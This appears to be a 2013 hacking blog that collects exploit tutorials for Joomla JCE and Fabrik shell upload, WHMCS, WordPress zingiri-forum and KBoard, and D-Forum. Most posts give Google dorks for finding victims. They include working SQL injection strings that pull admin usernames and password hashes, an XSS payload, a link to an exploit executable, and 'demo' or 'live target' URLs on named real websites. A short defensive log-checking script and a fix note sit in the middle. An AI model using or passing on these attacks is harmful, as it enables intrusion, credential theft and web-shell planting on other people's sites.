Tuesday, 12 November 2013

Com_Jce Shell Upload

JCE Exploit 2 

Download first: http://xx.pa-rc.org/x86/JCE.exe
The dorks:
inurl:"/index.php?option=com_jce"
inurl:index.php?option=com_virtuemart
Example:
Google dork
Then find a target: http://www.kazan.monarh.su/

If the dork works, the execution looks like the picture:
Now upload your shell…

Monday, 11 November 2013

WHMCompleteSolution SQLI



WHMCS? WHMCS is WHMCompleteSolution, a web app that is usually used for sales sites such as web hosting and domain sites.
OK, let's go!

1. First, find a vulnerable website with these dorks:

intext:"Powered by WHMCompleteSolution"


inurl:"submitticket.php"

inurl:dl.php?type=

2. Once you have a website, it's time to inject. For example, I got this website:

http://www.powermailings.com/billing/dl.php?type=d&id=1

The string to inject:

and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --


Now add that string to the end of the id number in the website's URL. Example:

http://www.powermailings.com/billing/dl.php?type=d&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --

Then press Enter!
When we inject this, if it succeeds the browser downloads a file in .pdf format. Inside this file are the WHMCS username and password :D

3. To log in:
http://www.target.com/path/admin


Example:
http://www.powermailings.com/billing/admin
OK, that's all for this tutorial. Enjoy...

Wordpress zingiri-forum Plugin SQL Injection


# Exploit Title : Wordpress zingiri-forum Plugin SQL Injection Vulnerability

# Security Risk : Medium

# Google Dork : inurl:/wp-content/plugins/zingiri-forum/mybb/showthread.php?tid=

# Location:site/[path]/wp-content/plugins/zingiri-forum/mybb/showthread.php?tid=[SQLi]

#Demo site  :


http://www.glXa.com/wp-content/plugins/zingiri-forum/mybb/showthread.php?tid=64537%27
http://sscXg.com/wp-content/plugins/zingiri-forum/mybb/showthread.php?tid=104%27

KBoard 3.3 SQLi/XSS


Exploit Title: WordPress plugins KBoard SQLi/XSS Vulnerabilities

# Vendor Homepage: http://www.cosmosfarm.com/products/kboard
# Download link: http://www.cosmosfarm.com/wpstore/kboard/download-kboard?version=3.3
# Category: webapps/php
# Version: 3.3
# Google dork: inurl:wp-content/plugins/kboard/board.php
---------------------------------------------------

[#] [XSS]
Vulnerable Parameters: pageid, search, keyword
-exploit-
http://[host]/wp-content/plugins/kboard/board.php?board_id=1&pageid=1&mod=list&search=&keyword=[xss]
-demo-
http://www.chahongardor.com/wp-content/plugins/kboard/board.php?board_id=1&pageid=1&mod=list&search&keyword=%22%27%3E%3CScRiPT%3Ealert%28%2FXSS%2F%29%3C%2FScRiPT%3E

[#] [SQL Injection]
-exploit-
http://[host]/wp-content/plugins/kboard/board.php?board_id=2&mod=document&uid=[SQL_Injection]
-demo-
http://www.chahongardor.com/wp-content/plugins/kboard/board.php?board_id=2&mod=document&uid=999+union+select+group_concat%28user_login%2C0x3a%2Cuser_pass%29%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18+from+wp_users
note: the result in page source
more sites in G00GLE

D-Forum 1.11

D-Forum 1.11 SQL Injection Vulnerability

EXPLOIT :

http://localhost/[path]/nav.php3?page=voirsujet&boardid=1&postid=[SQLi]



DORK:

"Powered by D-forum"
"nav.php3?page=voirsujet"



Live Target :

http://va.teamdh.free.fr/dforum/nav.php3?page=voirsujet&boardid=1&postid=1
-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--



POC :

-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--
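
The SQL injection posts above all inject into a parameter that should only ever hold an integer (id in dl.php, tid in showthread.php, uid in board.php, postid in nav.php3), which gives defenders a simple access-log check. The following is an added example, not part of the original posts: it flags requests where one of those parameters carries a non-integer value. The log lines, client addresses and the NUMERIC_PARAMS table are constructed for illustration, and matching on the script's file name alone is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script name -> parameters assumed to be integers (names taken from the posts
# above; treating board_id, pageid and boardid as integers is an assumption).
NUMERIC_PARAMS = {
    "dl.php": {"id"},
    "showthread.php": {"tid"},
    "board.php": {"uid", "board_id", "pageid"},
    "nav.php3": {"postid", "boardid"},
}

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, shortened values).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Nov/2013:10:00:01 +0000] "GET /billing/dl.php?type=d&id=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Nov/2013:10:00:09 +0000] "GET /billing/dl.php?type=d&id=1%20union%20select%201,2,3 HTTP/1.1" 200 731',
    '198.51.100.4 - - [12/Nov/2013:10:02:44 +0000] "GET /wp-content/plugins/zingiri-forum/mybb/showthread.php?tid=104%27 HTTP/1.1" 500 0',
    '198.51.100.9 - - [12/Nov/2013:10:03:10 +0000] "GET /dforum/nav.php3?page=voirsujet&boardid=1&postid=-null+union+select+1,2 HTTP/1.1" 200 900',
]

def suspicious_params(log_line):
    """Return [(script, param, decoded_value)] for integer params holding non-integers."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    expected = NUMERIC_PARAMS.get(script, set())
    hits = []
    # parse_qsl percent-decodes values and turns '+' into a space,
    # so encoded and unencoded variants are compared in the same form.
    for name, value in parse_qsl(url.query):
        if name in expected and not re.fullmatch(r"\d+", value):
            hits.append((script, name, value))
    return hits

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for script, name, value in suspicious_params(line):
            print(f"ALERT {script} {name}={value!r} :: {line.split()[0]}")
```

The same integer-only rule is the server-side fix: cast these parameters to integers or bind them in parameterized queries before they reach the database.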


Com_Fabrik Shell Upload

# Google Dork :
inurl:index.php?option=com_fabrik
or index.php?option=com_fabrik

# Vulnerable path :
http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

View Shell or Page-->
http://[target]/media/shell.php